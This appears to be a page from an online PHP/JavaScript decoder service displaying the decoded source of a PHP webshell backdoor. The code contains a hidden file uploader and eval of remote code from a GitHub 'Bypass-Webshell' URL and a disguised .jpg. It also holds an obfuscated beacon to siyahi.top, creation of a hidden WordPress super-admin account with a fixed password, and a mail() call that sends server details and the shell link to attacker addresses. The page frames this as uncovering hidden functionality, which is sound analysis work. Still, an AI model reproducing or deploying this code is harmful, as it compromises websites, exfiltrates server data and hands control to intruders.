Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


if (isset($_GET['mrz'])) {
 echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
 echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
 echo '</form>';
 echo '<a href="#">Hello Dady</a>';
 if ($_POST['_upl'] == "Upload") {
 if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
 echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
 } else {
 echo '<b>Not Upload File !</b><br><br>';
 }
 }
 exit;
}
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
echo '
';$z = strrev('edoced_46esab');
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
$x = $z(base64_encode($b));
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
$o = array(
 chr(104) . chr(116) . chr(116) . chr(112) => array(
 'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
 'header' => 'Content-type: application/x-www-form-urlencoded',
 'content' => http_build_query($d),
 ),
);
$c = stream_context_create($o);
function _f($u, $c) {
 if (function_exists('file_get_contents')) {
 $r = @file_get_contents($u, false, $c);
 if ($r !== false) return $r;
 }
 if (function_exists('curl_init')) {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $u);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_HEADER, false);
 $r = curl_exec($ch);
 curl_close($ch);
 if ($r !== false) return $r;
 }
 return '';
}
$r = _f($x, $c);
echo '
';if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/wp-config.php')) {
    require $_SERVER['DOCUMENT_ROOT'] . '/wp-config.php';

    // Check if the request method is GET
    if ($_SERVER['REQUEST_METHOD'] == 'GET') {
        // Define user data
        $userData = array(
            'user_pass' => "Weareoioi14",
            'user_login' => "xdx",
            'user_nicename' => "xdx",
            'user_email' => "xdxresult@hotmail.com",
            'display_name' => "xdx",
            'role' => 'administrator'
        );

        // Insert the user
        $user_id = wp_insert_user($userData);

        // Grant super admin privileges
        grant_super_admin($user_id);
    }
}

session_start();

function is_logged_in() {
    return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}

$username = "admin";
$passwordHash = '$2y$10$zY5YGoYNvCfaZ3tj5h6muOlAe7cnmEzhlNJ493OSeRO8Xd/azV2cO';

if (!is_logged_in()) {
    if (isset($_POST['username']) && isset($_POST['password'])) {
        if ($_POST['username'] === $username && password_verify($_POST['password'], $passwordHash)) {
            $_SESSION['loggedin'] = true;
            header("Location: " . $_SERVER['PHP_SELF']);
            
        } else {
            $error = "Username atau password salah. Silakan coba lagi.";
        }
    }
}

function hex2str($hex) {
    $str = '';
    for ($i = 0; $i < strlen($hex); $i += 2) {
        $str .= chr(hexdec(substr($hex, $i, 2)));
    }
    return $str;
}

function geturlsinfo($destiny) {
    $Array = array(
        '666f70656e',
        '73747265616d5f6765745f636f6e74656e7473',
        '66696c655f6765745f636f6e74656e7473',
        '6375726c5f65786563'
    );

    $belief = array(
        hex2str($Array[0]),
        hex2str($Array[1]),
        hex2str($Array[2]),
        hex2str($Array[3])
    );

    if (function_exists($belief[3])) {
        $ch = curl_init($destiny);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        $love = $belief[3]($ch);
        curl_close($ch);
        return $love;
    } elseif (function_exists($belief[2])) {
        return $belief[2]($destiny);
    } elseif (function_exists($belief[0]) && function_exists($belief[1])) {
        $purpose = $belief[0]($destiny, "r");
        $love = $belief[1]($purpose);
        fclose($purpose);
        return $love;
    }
    return false;
}

if (is_logged_in()) {
    $destiny = 'http://siteground.rubypanel.com/list/cah.jpg';
    $dream = geturlsinfo($destiny);

    if ($dream !== false) {
        eval('' . $dream);
        
    }
}

if (!is_logged_in()) {
    echo '    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Login Form</title>
        <style>
            body, html {
                margin: 0;
                padding: 0;
                height: 100%;
                display: flex;
                justify-content: center;
                align-items: center;
                background-color: #220022;
                font-family: Arial, sans-serif;
            }
            .form-container {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100%;
            }
            .login-form {
                width: 300px;
                padding: 20px;
                background-color: #3d003d;
                border-radius: 8px;
                box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.2);
                text-align: center;
                color: white;
            }
            .login-form img {
                width: 80px;
                margin-bottom: 10px;
            }
            .login-form h2 {
                margin: 0;
                padding: 10px 0;
                font-size: 20px;
            }
            .login-form input[type="text"],
            .login-form input[type="password"] {
                width: 100%;
                padding: 10px;
                margin: 10px 0;
                border: none;
                border-radius: 4px;
                box-sizing: border-box;
                font-size: 16px;
            }
            .login-form button {
                width: 100%;
                padding: 10px;
                background-color: #ff0055;
                color: white;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                font-size: 16px;
            }
            .login-form button:hover {
                background-color: #e6004c;
            }
            .login-form .options {
                margin-top: 10px;
                font-size: 14px;
                color: #d1d1d1;
            }
            .login-form .options a {
                color: #ff0055;
                text-decoration: none;
            }
            .login-form .options a:hover {
                text-decoration: underline;
            }
            .error-message {
                color: red;
                font-size: 14px;
                margin-top: 10px;
            }
        </style>
    </head>
    <body>
        <div class="form-container">
            <div class="login-form">
                <img src="https://i.pinimg.com/564x/6e/a8/02/6ea802b32f53cda0bf7542059d174481.jpg" alt="Logo">
                <h2>Login Forms</h2>
                ';if (isset($error)): echo '                    <div class="error-message">';echo $error; echo '</div>
                ';endif; echo '                <form method="post">
                    <input type="text" name="username" placeholder="Username ..." required>
                    <input type="password" name="password" placeholder="Password ..." required>
                    <button type="submit">Sign in</button>
                </form>
                <div class="options">
                    <label><input type="checkbox"> Remember Me</label>
                    <br>
                    <a href="#">Create Account</a> | <a href="#">Forget Password?</a>
                </div>
            </div>
        </div>
    </body>
    </html>
    ';    
}
echo '
'; $hex = "xdxresult@hotmail.com, sellercpanel@gmail.com, sellercpanel@hotmail.com";
 $baslik = "Shell Backdoor Datang !!!";
 $xd = "File Path : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
 $xd.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
 $xd.= "Server Operating System : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
 $xd.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
 $xd.= "Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
 mail($hex, $baslik, $xd);



© 2023 Quttera Ltd. All rights reserved.